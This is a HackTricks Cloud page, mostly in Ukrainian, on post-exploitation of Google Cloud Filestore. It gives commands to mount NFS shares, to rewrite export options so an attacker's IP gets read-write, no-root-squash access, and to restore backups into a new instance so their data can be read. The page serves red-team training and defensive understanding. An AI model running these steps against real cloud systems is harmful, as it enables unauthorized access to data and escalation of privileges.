GCP - Filestore Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

Для отримання додаткової інформації про Filestore перегляньте:

GCP - Filestore Enum

Mount Filestore

Спільна файлова система може містити чутливу інформацію, цікаву з точки зору атакуючого. Маючи доступ до Filestore, можна монтувати його:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Щоб знайти IP-адресу екземпляра filestore, перевірте розділ перерахування на сторінці:

GCP - Filestore Enum

Видалити обмеження та отримати додаткові дозволи

Якщо атакуючий не знаходиться в IP-адресі з доступом до спільного ресурсу, але у вас є достатні дозволи для його модифікації, можливо видалити обмеження або доступ до нього. Також можливо надати більше привілеїв для вашої IP-адреси, щоб отримати адміністративний доступ до спільного ресурсу:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Відновлення резервної копії

Якщо є резервна копія, її можна відновити в існуючому або в новому екземплярі, щоб її інформація стала доступною:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Створіть резервну копію та відновіть її

Якщо ви не маєте доступу до спільного ресурсу і не хочете його змінювати, можливо створити резервну копію і відновити її, як було згадано раніше:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 1 month ago